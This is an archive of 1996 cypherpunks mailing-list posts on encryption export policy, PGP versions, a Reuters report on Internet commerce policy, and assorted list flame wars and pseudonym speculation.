Message-ID: <07eiyD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> information, a la the famous "canary traps"). To whit, M recipients of the
"Cypher punks" can't spell.                         ^

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 5 Dec 1996 21:37:05 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Ira Magaziner: FREE Internet
Message-ID: <199612060538.WAA20032@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

    Just posted an hour ago on CNN

    I don't believe it! Ira Magaziner's interagency task for recommended
    that the Internet be a free zone, duty free, and to try and persuade
    all countries not to limit speech, encryption, etc.  two days in a 
    row: first the SPA changed course and really balked, and now this 
    from an ultra-liberal!  maybe there is such a thing as a spark of
    freedom in the gathering darkness!
 
<a href="http://www.cnn.com/TECH/9612/05/clinton.internet.reut/index.html"> 
Ira Magaziner Task force recommends Free Zone Internet </a>

    ===CNN post follows===

<html><head><title> Magaziner recommends Free Internet </a></title></head>
<body>
<H1>Clinton advisers urge free market approach for Internet</H1>
December 5, 1996<BR>
Web posted at: 10:30 p.m. EST

<P>
WASHINGTON (Reuter) -- The Internet could provide a huge
boost to the U.S. economy if the federal government pursues
"free market" policies in cyberspace, a group of President
Clinton's top advisers said in a draft report obtained by
Reuters.<P>

The group, an interagency task force headed by senior
presidential adviser Ira Magaziner, recommended the
administration work globally to protect the Internet from new
taxes, censorship and other onerous forms of regulation.<P>

After seven months of deliberations, the task force is
preparing to issue for public comment a report of principles and
policies the Unites States should pursue, Magaziner said in an
interview. <P>

"One of the things we're trying to do with this paper is as
much say what government should not do as say what they should
do," Magaziner said."A lot of what industry is concerned
about is that governments are already beginning to take actions
around the world that would inhibit commerce."<P>

The growth of Internet commerce could help boost U.S.
exports of everything from movies and news to software and
consulting services. Exports of such products totaled $40
billion in 1995, the draft report noted.<P>

The idea is to hitch U.S. exports to the speeding Internet
commerce train. Sales of goods and services online are projected
to grow to $7 billion in the year 2000, from about $1 billion
this year, according to market researchers at Jupiter
Communications.<P>

"Companies have told us there would be a tremendous
potential to increase world trade across the Internet if we
could provide the right kind of environment," Magaziner said.<P>

The draft report, called "A Framework for Global Electronic
Commerce," covers nine issues, from taxation and customs to
privacy and security. <P>

On taxation, the draft report echoes a report issued by the
Treasury Department last month by stating no new taxes should be
imposed. Acting through the World Trade Organization,the United
States should push for the Internet to be designated a duty-free
zone, the draft said.<P>

Some consumers worry their privacy will be violated
when they shop online. he report said governments should push
vendors to disclose what will be done with information about
consumers rather than dictate to merchants what they can or
cannot do with the data. <P>

On some issues, such as encryption -- encoding information
in a scrambled format to provide a measure of security or
privacy -- existing administration policies may be seen as
conflicting with the free market approach of the draft report.
<P>

Copyright 1996 
<a href="http:/www.ccn.com/interactive_legal.html#Reuters">
Reuters Limited </a>. All rights reserved.
</body></html>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqewuL04kQrCC2kFAQH7eAP+L4Fk1sZgMl/YhufgluegE5Xo7nCvSJ8u
rqhgBGmvE1/rY1HacDFt/4a9SgXkEfNPohkQoGnFccx1jhgZpBKbx8SQrIPPboHh
Indv5MJbvcdGYfTR0UKms1t0iCv0DiQgtyXMxvHWFVTzByaKLu4cuEgatlSmsIoK
SfRT376DqLg=
=SSQB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 5 Dec 1996 23:56:15 -0800 (PST)
To: cypherpunks <azur@netcom.com>
Subject: [PVT] Re: Stinger Specs
In-Reply-To: <3.0.32.19961205212336.006a520c@netcom14.netcom.com>
Message-ID: <199612060757.AAA23206@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In <3.0.32.19961205212336.006a520c@netcom14.netcom.com>, on 12/05/96 
   at 09:24 PM, Lucky Green <shamrock@netcom.com> said:

::At 07:08 PM 12/5/96 -0800, Steve Schear wrote:
::>This has all vanished is our zeal
::>to protect youth and society from any activity which might lead 
::>injury or misuse.  I can't even find a place to buy a niece a real 
::>chemistry set as tort laws have forced them from the market.  When 
::>considering the plummeting >interest and achievement of our youth in 
::> math and science we look no further for a reason.

::When Wernher von Braun (if the reader doesn't know who von Braun was,
::shame on your teachers. Hint: first human on the Moon.) first became
::interested in rocketry, he was a student of music. Classical piano, to
::be exact. He got his hands on a book about using rockets for space
::exploration. To his dismay, the book was full of mathematical 
::equations. He went to his math teacher, asking him for help with the 
::equations. The teacher must have been of help, since von Braun went on 
::to become the single most knowledgable person in his field. And no, it 
::wasn't piano playing.

::There is nothing like some real life challenges to spark a young
::person's mind. Today, conducting the experiments that fueled von 
::Braun's imagination would be a felony. The mere possession of the 
::chemicals he used in his early twenties is illegal.

::This country has set out on a project to dumb the minds of its young.
::With great success.

    bingo!  and, how.  they have succeeded beyond their wildest dreams!

    I had a roommate at Harvard (late fifties) who had incredibly deep     
    pockets. his mother died his freshman year, leaving him her estate 
    on the tip of Fisher's Island, including the costal defense battery 
    positions and bunkers.

    he had an Apache twin for which I managed to get a license including 
    instrument very quickly --we then went to FI for weekends and 
    built and fired everything you can imagine.  only a few curious 
    paid us any mind as the closest estate to hers was at least 1/2 
    mile.

    can you imagine that today? --the tip guards the entrance to 
    the New London pig boat pens and the LI sound!  

    there were still plenty of professors with both knowledge on the 
    early rockets, and open enough to "private" teach. My advisor was a 
    Nobel prize winner, very accessible, and provided both help and 
    introductions to men most never knew even existed in the vast 
    science complex north of the yard.  most were in the same old 
    building (Pierce) with the RF screens on the outside walls to 
    shield against the primitive radar  --long dark and narrow halls.

    It is a whole different ball game in academia. men whom I have
    recently met are nothing like their predecessors who were open and
    warm --everyone is so "professional" and they are _cold_.

    sad story in general.

    some bright spots though, I guess.  I was rather surprised by
    experiments and their depths in AP Chemistry offered my third son
    by St George's Dixie High School --impressive and not the usual 
    restrictions on "oh, poor Johnny might hurt himself while clowning
    ...err learning."  a) we have better discipline which works; and
    b) we don't put up with those silly whiners (so far).

    but the future does not speak well with declining tests scores 
    which, for instance, require the SATs to be watered 20-30% so the
    median would still be 500!  to think that the pair of 800s I
    received in the 50s can be acquired by someone scoring less than
    650s --what value has the US placed on education?  enough so our
    students now rank well down in the second 10 on international 
    tests!  what makes that worse is the _majority_ of Korean
    students can perform --the lower 1/3 of our students have already
    dropped out of school, and the second third are too uneducated
    to participate.  junior colleges are graduating students who
    would not have passed out of tenth grade 20-30 years ago.

    and, the government wants more mind control --even Bitch's "It
    Takes a Global Village."  at least it's fat chance out here in
    the high desert.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqfRNr04kQrCC2kFAQHfxAP+NbZ4JZIjraKsVBAKLx60AAKYyFDeT8Ly
o8DAnYdfkuEtN04orz+fqFIKUeNjonglMYeIp/xGqTtQeqVRS6uURpD/K8EAxDR/
jv1EQanC2SrV6yc0TtiNwV9WTFlRrOZjt0gH3uwfv+yDPtgpDVaBL0b6sNH+6BDg
Sh7UaRbkeYo=
=Ssdu
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Fri, 6 Dec 1996 05:46:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption/data-changing in russia (fwd)
Message-ID: <m0vW0bU-0001O8C@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Fri, 06 Dec 1996 14:23:48 -1000
> To: cypherpunks@toad.com
> From: Benjamin Grosman <bgrosman@healey.com.au>
> Subject: Encryption/data-changing in russia
 
> A friend of mine who is Russian, but lives out here, frequently
> corresponds with friends in Russia via email, and in the course of sending
> emai, they occasionally send an attachment. However, the attachment that
> _all_ his russian friends send, including the ones who use MIME capable
> email clients such as Eudora, always, _always_, uuencode files, and they say
> they can't do MIME. I am wondering if the encryption/data-changing laws in
> Russia are so strict as to disallow MIME encoding even, but still allows UU
> for some reason?
> 

Probably has to do with the character set they're using; nothing more.

--
 Wild new Ubik salad dressing, not    | gimonca@skypoint.com
 Italian, not French, but an entirely | Minneapolis MN USA
 new and different taste treat that's | http://www.skypoint.com/~gimonca
 waking up the world!                 | A lean, mean meme machine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Fri, 6 Dec 1996 06:23:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: DES in IBM 730 Assembler and/or COBOL
Message-ID: <v03007807aecdce72999b@[206.11.192.123]>
MIME-Version: 1.0
Content-Type: text/plain


I need a DES (preferrably public domain, but I will pay for it) in IBM 730
assembler and COBOL.  Anybody know of one?

Bruce

************************************************************************
* Bruce Schneier            2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems       000,000,000,000,000,000,002,000,000,002,293
* schneier@counterpane.com  The last prime number...alphabetically!
* (612) 823-1098            Two vigintillion, two undecillion, two
* 101 E Minnehaha Pkwy      trillion, two thousand, two hundred and
* Minneapolis, MN  55419    ninety three.
* http://www.counterpane.com
************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@cis.upenn.edu>
Date: Fri, 6 Dec 1996 06:03:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: EudoraWin95 3.0 /PGP plugin query
Message-ID: <3.0.1.32.19961206090404.006ca494@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to find the plugin but it seems to have vanished and lkinks to
it seem to fail. Anyone there who can help me find it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Dec 1996 06:30:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Proof that "cypher punks" have complete degenerated...
Message-ID: <isqiyD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


No one even commented on the latest Dr. Dobbs issue.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Dec 1996 07:38:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199612050559.XAA19657@manifold.algebra.com>
Message-ID: <m8RiyD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Dr.Dimitri Vulis KOTM wrote:
> >
> > "Cypher punks" have degenerated into an inbred cybermob whose goal in life
> > is to "enforce" the "rules" that apply to "newbies" (more Cabal-speak) but
> > not to the "in-crowd".
> >
> > Paul Bradley, the vitriolic flamer, is a good example of a "cypher punk".
> > Paul doesn't know much about cryptography, but he's been harrassing Don Woo
> > because Don Wood dared propose a cryprosystem. I haven't examined Don's
> > proposal and don't know how good it is. Paul apparently FTP's Don's files
> > but lacked the technical knowledge to understand the proposal. Paul first
>
> Why don't you look at it. I am interested in your comments regarding
> possible attacks on Don Wood's system.

Igor,

If an entrepreneur wants to sell a new electrical gizmo and wants an
independent review of its safety, he pays $$$ for it. Apparently one of the
functions of the new brand of "cypher punks" is to provide a similar service
for free. Sorry, I'm not a part of it, and I'm not *that* interested in Don's
proposal. I have better use for my time.

(I suspect that you too have better use of your time, like shagging your
girlfriend and/or working on the robomoderated misc.jobs.* - nag, nag)

I also don't think that the ease of breaking the code should be the only
consideration in evaluating a low-end cryptographic product. I happen to
advocate widest possible availabily of crypto for the unwashed masses - again,
unlike today's "cypher punks" who think crypto is "kewl" stuff for the "3lit3
d00dz". This current pseudo-crypto crowd reminds me of a hobby I had when I
was very young and New York City had hundreds of dial-up BBS's. Most of them
were run by kids and their main function was the "elite" download section
featuring pirated copyrighted software. I figured out a technique to download
whatever I wanted from the "elite" sections without the BBS operator's knowing
who it was. (They normally "validated" only someone they knew and demanded
uploades for downloads. "Expropriate the expropriator", as Lenin taught us.)
After a while I got tired of it because invariably the commercial software I
downloaded was junk, not worth the downloading time and the disk space.

Back to crypto: If someone wants to market (and support) a crypto package for
the masses and gets the masses to deploy it, I take my hat off to them. It
doesn't matter if the code itself can be cracked as easily as the codes used
in PKZIP or MS Excel or MS Word (reportedly). If the users discover that the
code isn't strong enough for their needs, they'll upgrade to stronger codes.
The path from weak crypto to strong crypto is much shorter than the path from
no crypto to some crypto.

If the user interface and logical and transparent and provides hooks to
replace the weak (non-export-controlled) crypto being shipped with a stronger
one (say, by FTPing a DLL) then it's a Good Thing.

Don is doing a Good Thing and the "cypher punks" are doing an evil thing.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Fri, 6 Dec 1996 00:52:35 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: FW: Dimitri IS Detweiler
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961206085436Z-867@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain




Nobody wrote:
>
>Dimitri Vulis wrote:
>
>| He he he what is sauce for the goose is sauce for the gander blah blah
>  ^^^^^^^^
>| blah intellectual dishonesty blah blah blah typical logorrhetic "cypher
>| punk" can't spell his own nym politely.
>
>There we have it! PROOF that Dimitri is a tentacle of Detweiler.
>Own up Dimitri!  (sorry for the previous accusation Dale)
>

If THAT (he he he) is proof that Dimitri is Lance Detwieler then using
the same theory, so it Mutley the cartoon dog.

Nobody wrote this......I wish they hadn't bothered!




>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 6 Dec 1996 10:13:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Science Generations
In-Reply-To: <v03007800aecd4d8305f9@[207.167.93.63]>
Message-ID: <v03007800aece135625e1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:12 AM -0800 12/6/96, Dale Thorn wrote:
>Timothy C. May wrote:

>> * Generation 3: The computer generation. The 1970s-80s, who grew up with
>> Commodore PETs and Apple IIs (and some later machines). These are the "new
>> pioneers"  of the 1980s-90s, the Marc Andreesens and the like.
>
>I would guess that those who became and remained successful technically
>(as opposed to becoming "business people") were using HP computers and
>such in the 1970s.  I for one was a heavy user then, and PETs, Apples,
>Radio Shack, etc. computers weren't reliable enough for serious work.


My points were about the _children_ and what they were using when they grew up.

(In fact, note my use of the phrase "who grew up with Commodore PETs and
Apple IIs...")

Indeed, in the 1970s I was using H-P 9825s and DEC PDP 11/34s, but the
teenagers of that decade were, if they were fortunate and energetic, using
PETs, Apple IIs, and the like.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 6 Dec 1996 07:27:28 -0800 (PST)
To: andrew_loewenstern@il.us.swissbank.com
Subject: Re: PGP 5.0??
In-Reply-To: <9612060130.AA01059@ch1d157nwk>
Message-ID: <199612061027.KAA00273@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> someone writes:
> >  Wrong!  You must telnet to all.net, but the correct logname
> >  is "getpgp" with no password.  It will ask you some questions
> >  (like are you a US citizen), and then give you an
> >  export-controlled ftp directory to go to.
> >
> >  As far as I know, however, PGP 5.0 is still in beta test,
> >  though you can get a snapshot from there (in source form only).
> >  They also have source and binaries for the latest released
> >  version of PGP 3.
> 
> what are you guys talking about???  AFAIK, the most current,
> released, version of PGP is 2.6.2.  

pgp263ia is more recent, and has more bug fixes.  pgp263ui more recent
still, and has the same bug fixes plus some additional functionality,
minus some other functionality.

Chronologically:

mit pgp262
pgp263i
pgp263ia
pgp263ui

> Version 3 is not finished and anything you may get your hands on is
> a prerelease version.  

You won't be getting your hands on a prerelease version unless you're
one of their commercial licensors.

> PGP 4 and 5 simply don't exist!

quite so.

> 
> ...and isn't all.net the site of the Good Doctor Fred Cohen??

Sure is.  That part I think was a practical joke.  Much like
suggesting someone connect to ftp site `127.0.0.1' for kewl war3z.

Cohen was actively harrassing people (email to postmaster, employee,
etc) who so much as pinged his site, for some unfathomable reason he
viewed this as a malicious attack on the security of his machine.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 6 Dec 1996 10:44:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: Gilmore / Logos
Message-ID: <199612061833.KAA16864@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Heh.
Think again. Logos is obviously someone who has a lot of
time on his/her hands. Consider the volume of Gilmore over
the last several months compared to the volume of Logos
over the last several days. Gilmore has quite a bit more
on his mind than how people behave on CP. Logos' identity
is clearly not Gilmore. I doubt Gilmore even reads CP
anymore.

So who _is_ Logos. We know that Logos:

1)Tim May suspects who Logos is
2)Is a prolific poster
3)Intends to combat DLV/DT and other Detweilers

The oddest tidbit yet is Tim May's posting to the *list* 
"P.S. I certainly hope this "Logos" nym is not who 
I suspect it is, as this will surely end our Real World 
friendship. A fucking bozo."

This post clearly is an act of misdirection. If May had a 
personal bone to pick with someone he actually knows
than what purpose does it serve to announce this to the 
list? Nothing less than to preempt the obvious assertation
that Logos is Tim May.

W.W. Brierson






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 6 Dec 1996 07:43:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 5.0??
In-Reply-To: <9612060130.AA01059@ch1d157nwk>
Message-ID: <199612061541.KAA24145@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain



andrew_loewenstern@il.us.swissbank.com said:
> what are you guys talking about???  AFAIK, the most current, 
> released,   version of PGP is 2.6.2.  Version 3 is not finished and 
> anything you may get   your hands on is a prerelease version.  PGP 4 
> and 5 simply don't exist! 

PGP 4 is ViaCrypt's latest version of pgp.

It has some features that pgp 2.6.* doesn't have.

>From the User's Manual:
>
>     ViaCrypt PGP supports three types of keys:
>
>       Dual-Function Keys are keys that are interoperable and 
> compatible  with pre-4.0 versions of ViaCrypt PGP. They can be used 
> for  encryption/decryption and for digital signatures.
>
>       Single-Function, Encryption-Only Keys are keys that have been 
> designated to be used for only encryption/decryption, and cannot be 
> used for digital signatures.
>
>       Single-Function, Signature-Only Keys are keys that have been 
> designated to be used for only digital signatures, and cannot be used 
> for encryption/decryption.  Single function keys are not usable by 
> Version 2.7.1 or earlier. 

There is also a "business edition" with still other featuers, namely a 
"Corporate Access Key".

See http://www.pgp.com/products/viacrypt-business.cgi


rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 6 Dec 1996 10:58:45 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: The Science Generations
Message-ID: <199612061858.KAA22343@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:12 AM 12/6/96 -0800, Dale Thorn wrote:
>I would guess that those who became and remained successful technically
>(as opposed to becoming "business people") were using HP computers and
>such in the 1970s.  I for one was a heavy user then, and PETs, Apples,
>Radio Shack, etc. computers weren't reliable enough for serious work.

I guess those people using VisiCalc on the Apple ][ weren't doing serious
work :-).  (Also the many small businesses using these early machines for
AR, Accounting etc.)  Me, I was doing OS programming on IBM 370s.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 6 Dec 1996 08:03:54 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Mondex
Message-ID: <Pine.SUN.3.94.961206110148.1568B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain





Can anyone briefly discuss the anonymity features (or lack thereof) for
Mondex?


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 6 Dec 1996 10:59:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: cypher-PUNKS...
In-Reply-To: <009AC690.10DDC280.3@SPRUCE.HSU.EDU>
Message-ID: <v03007801aece1de9a1d9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 PM -0500 12/5/96, jc105558@spruce.hsu.edu wrote:
>I am writing this post to inform subcsribers of this list of the problems I
>have seen in this service.  The number one problem being off subject
>discussion
>I understand that the name of this is cypherpunks, but why not put a little
>more cypher and a lot less punk.  I can understand how it can all get started
>One person posts some intelligent information.  Then another replys
>dissagreeing
>with the original sender.  Then the sender takes it personally, and feels
>a need
>to flame the other.  There is nothing wrong with flaming a bit, but for the
>name-sake of this mailer, please post more realevent (or at least interesting)
>information.  Logos take a chill pill.  You aren't a policeman.   Tim May, do
                                                                   ^^^^^^^^^^^
>you have anything on subject to discuss?
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

I've initiated more threads on crypto-related and politico-crypto topics
than nearly anyone else. If you haven't seen them, you've been on the list
too short a time to be making such pronouncements as you've just made.

--Tim May

>p.s. Logos, Tim May nothing personal, I hope.

And don't take it personally that "jc105558@spruce.hsu.edu" is now in my
kill file.


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jc105558@spruce.hsu.edu
Date: Fri, 6 Dec 1996 10:04:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Apology
Message-ID: <009AC6F5.DD0C50A0.3@SPRUCE.HSU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


- James - wrote:
>I am writing this
...
>Tim May, do  
>you have anything on subjest to discuss?

I apologies publicly for this comment.  I'm sorry Tim.  My bad.

- James -




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TQDB <tqdb@feist.com>
Date: Fri, 6 Dec 1996 10:16:09 -0800 (PST)
To: dc-stuff@dis.org
Subject: Aghast..
Message-ID: <Pine.BSI.3.91.961206121150.22629C-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain




    I couldn't believe my eyes when reading through Inter@ctive Week's 
"The Driving Forces of Cyberspace" Top 25 list I saw that Louis J. 
Freeh, Director of the FBI received an Honorable Mention because of him 
supposedly believing that "Encryption is an inalienable right."  I 
suppose that isn't necessarily a lie, but it would need the word "Weak" 
added on to the front in order to qualify it.  Anyway, I was quite 
disappointed in seeing their poor choice of this candidate.
.TQDB

  -=| T.Q.D.B. - tqdb@wichita.fn.net - http://www.feist.com/~tqdb |=-
 
           "The term 'hacker' is not necessarily derogatory.
          A small percentage of them give the rest a bad name."
       --Special Agent Andrew Black, FBI SF Computer Crime Squad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 6 Dec 1996 12:35:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Systems with weak crypto, was: The House Rules At The Permanent VirtualCypherpunks Party
Message-ID: <199612062035.MAA03484@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:46 AM 12/6/96 -0500, Dr.Dimitri Vulis KOTM wrote:
>If an entrepreneur wants to sell a new electrical gizmo and wants an
>independent review of its safety, he pays $$$ for it. Apparently one of the
>functions of the new brand of "cypher punks" is to provide a similar service
>for free. Sorry, I'm not a part of it, and I'm not *that* interested in Don's
>proposal. I have better use for my time.

However, I assume that you have no objection to others reviewing Don't
proposal for free (Actually for reputation).
>
>I also don't think that the ease of breaking the code should be the only
>consideration in evaluating a low-end cryptographic product. ...
>
>... If someone wants to market (and support) a crypto package for
>the masses and gets the masses to deploy it, I take my hat off to them. It
>doesn't matter if the code itself can be cracked as easily as the codes used
>in PKZIP or MS Excel or MS Word (reportedly). If the users discover that the
>code isn't strong enough for their needs, they'll upgrade to stronger codes.
>The path from weak crypto to strong crypto is much shorter than the path from
>no crypto to some crypto.
>
>If the user interface and [did you mean "is" - bf] logical and transparent 
>and provides hooks to
>replace the weak (non-export-controlled) crypto being shipped with a stronger
>one (say, by FTPing a DLL) then it's a Good Thing.

Good interfaces are definitely something needed for the widespread adoption
of crypto, either strong or weak.  However, the general opinion I have
heard is that UIs with easily replaced crypto are covered by ITAR.


>Don is doing a Good Thing and the "cypher punks" are doing an evil thing.

If Don is contributing to better interfaces, then I agree he is doing a
good thing.  If all he is doing is proposing a new algorithm and describing
it with, to be charitable, non-standard uses of well defined terms, then I
disagree.

I strongly disagree that cypherpunks are doing an evil thing by exposing
the weaknesses in anyone's (including Don's) crypto system.  There are many
ways to contribute, and publicizing the facts about a system are one of
them.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Dec 1996 09:43:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: UNR_avl
Message-ID: <1.5.4.32.19961206174050.006989b4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-06-96, NYT:

Compromise on Encryption Exports Seems to Unravel

"We really feel that there has been a bait and switch situation 
and I'm not going to be silent about it," said Roel Pieper, 
chief executive and vice chairman of Tandem Computers. 

A Nov. 15 executive order that transferred export oversight 
to Commerce contained several new wrinkles that even previous 
industry supporters consider potential deal breakers. For one 
thing, the Justice Department would play a consulting role to the 
Commerce Department, which industry executives see as giving 
law-enforcement officials too big a role in the export process. 

And they contend that the order prescribes a system that might 
enable law-enforcement officials to unscramble messages 
while they are being transmitted, rather than after the 
fact, as the IBM compromise had seemed to specify. 

-----

http://www.nytimes.com/library/cyber/week/1206encrypt.html

UNR_avl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 6 Dec 1996 12:48:42 -0800 (PST)
To: "'cyhpherpunks@toad.com>
Subject: RE: Silence is not assent (re the Vulis nonsense)
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961206204826Z-9897@INET-05-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dale Thorn

If you could analogize the list to a human society, then you might
understand that a pattern of decadence can set in here as it does in
the more visible society, as is run from Washington DC, etc.

It is my hope to make a contribution here (as in the more visible
society)
to fight off some of that decadence, even when I get beat up on for it.
.................................................


There is a huge the difference between a society of people relating to
each other based on principles of coercion vs an extemporaneous society
of individuals who make their own decisions (daily) about when/where/how
long they will associate with another.

The society run by Washington,D.C. expects that people will have no
choice but to fly in formation in the direction set by the leader who
represents the majority (sort of).

The virtual "society" of the cpunks is only based on their interest in
opening up their mail and reading a few messages here & there according
to their mood of the day or the moment.   

It is true that formal societies, like the one which was initially
intended by The Founders (of the US), often run afoul of the original
purpose for which it was begun.   They decay for many reasons.   This is
precisely one of the elements in the background of the cpunks thinking
("the founders" and others) about societies and the "ties that bind"
(supposedly) us to each other:  the interest in being released from that
